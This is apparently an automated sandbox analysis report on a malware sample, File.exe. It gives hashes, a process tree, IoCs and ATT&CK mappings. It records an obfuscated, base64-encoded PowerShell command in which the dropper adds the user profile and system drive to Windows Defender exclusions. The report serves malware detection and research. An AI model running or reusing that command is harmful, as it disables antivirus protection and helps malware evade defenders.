8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a

General

Target

File.exe
Size

4.0MB
MD5

f74ccaec9935cca19122478058c39f79
SHA1

5dbffbe85764d0bd43a90a1ef8eb8d8c5a540527
SHA256

8d2d9d8d937c880d75eb1e4a930f273a0b215ba1b15c07c10a7d902f23b0b08a
SHA512

2cb3379d4c37b2d74f3ae51a0cc0551eb146e5ff6822b0b76e15c63d9f6bd116ed569a5a72cd8be2c37695bfa5cb9ebdd08e27803a9d19cadcc6315b2ebde6ef

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

[New]344334.exe

pid process

2000 [New]344334.exe
Loads dropped DLL 1 IoCs

Processes:

File.exe

pid process

976 File.exe

pid	process
2000	[New]344334.exe

pid	process
976	File.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1472 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1472 powershell.exe

pid	process
1472	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1472	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

File.exe[New]344334.execmd.exe

description	pid	process	target process
PID 976 wrote to memory of 2000	976	File.exe	[New]344334.exe
PID 976 wrote to memory of 2000	976	File.exe	[New]344334.exe
PID 976 wrote to memory of 2000	976	File.exe	[New]344334.exe
PID 976 wrote to memory of 2000	976	File.exe	[New]344334.exe
PID 2000 wrote to memory of 628	2000	[New]344334.exe	cmd.exe
PID 2000 wrote to memory of 628	2000	[New]344334.exe	cmd.exe
PID 2000 wrote to memory of 628	2000	[New]344334.exe	cmd.exe
PID 628 wrote to memory of 1472	628	cmd.exe	powershell.exe
PID 628 wrote to memory of 1472	628	cmd.exe	powershell.exe
PID 628 wrote to memory of 1472	628	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:976

C:\Users\Admin\AppData\Roaming\[New]344334.exe
C:\Users\Admin\AppData\Roaming\[New]344334.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
3⤵
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG0AaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAdwBsAHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAGwAbAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGgAIwA+AA=="
4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
613.8MB

MD5
1ed195c5c4e80c1501b9658ca8a9cac8

SHA1
befd965d451fb7464d110c7ba9db3e753b03e477

SHA256
ad5e400711094e4cc806a761cbb25b20364596cbacdbc2ddf8c6feb53e4039b5

SHA512
a1a4a4e2ef7d3424f461d33755bb8d761e63d76ba3fa8aa27e667a90bab3692bf6636dd0c7e5977d6776202ea0fa9a5c2501ad2758e03b6202dffa6192635e26

Download Submit
C:\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
633.3MB

MD5
a8cf820149a81d7b85a64ca72d7fbbcc

SHA1
38f0d3ecdd7f05e1bd9097da7576458ebfec0e28

SHA256
141534dd65409e1fb92900c68f37f2641c87baee47be940b8e880366ce0e9a8f

SHA512
cdfd06d48b76602210ab3327072587053b3ace332e744de467cef5a52e7529831b81bbcf1c2d62279dca22c3d6f8fe19d59a947a2be716289990dc533c7a9312

Download Submit
\Users\Admin\AppData\Roaming\[New]344334.exe
Filesize
665.9MB

MD5
5ab8f145708b1bf7f408243921664a2e

SHA1
45d1d852c9770a5005c93a84565c16ceb1fd567a

SHA256
fa4fee19c6648895a0b5caef6becd093c3ea365ee23edb1925eb1d870fcf92f0

SHA512
f1a40a4afa62864d7d04179a8dec7f9320577cb31c23b88e837d8ec7a6ddcf7be658ea0d7bc6d1a29958c88006fc09db12852d05ce88bb9416a063897bd29e48

Download Submit
memory/628-62-0x0000000000000000-mapping.dmp

Download
memory/976-54-0x00000000752D1000-0x00000000752D3000-memory.dmp

Filesize
8KB

Download
memory/1472-63-0x0000000000000000-mapping.dmp

Download
memory/1472-65-0x000007FEECC60000-0x000007FEED683000-memory.dmp

Filesize
10.1MB

Download
memory/1472-67-0x0000000002904000-0x0000000002907000-memory.dmp

Filesize
12KB

Download
memory/1472-66-0x000007FEEC100000-0x000007FEECC5D000-memory.dmp

Filesize
11.4MB

Download
memory/1472-68-0x000000001B8F0000-0x000000001BBEF000-memory.dmp

Filesize
3.0MB

Download
memory/1472-69-0x000000000290B000-0x000000000292A000-memory.dmp

Filesize
124KB

Download
memory/2000-60-0x000000001C9F0000-0x000000001CC22000-memory.dmp

Filesize
2.2MB

Download
memory/2000-61-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp

Filesize
8KB

Download
memory/2000-59-0x000000013F3B0000-0x000000013F5F8000-memory.dmp

Filesize
2.3MB

Download
memory/2000-56-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing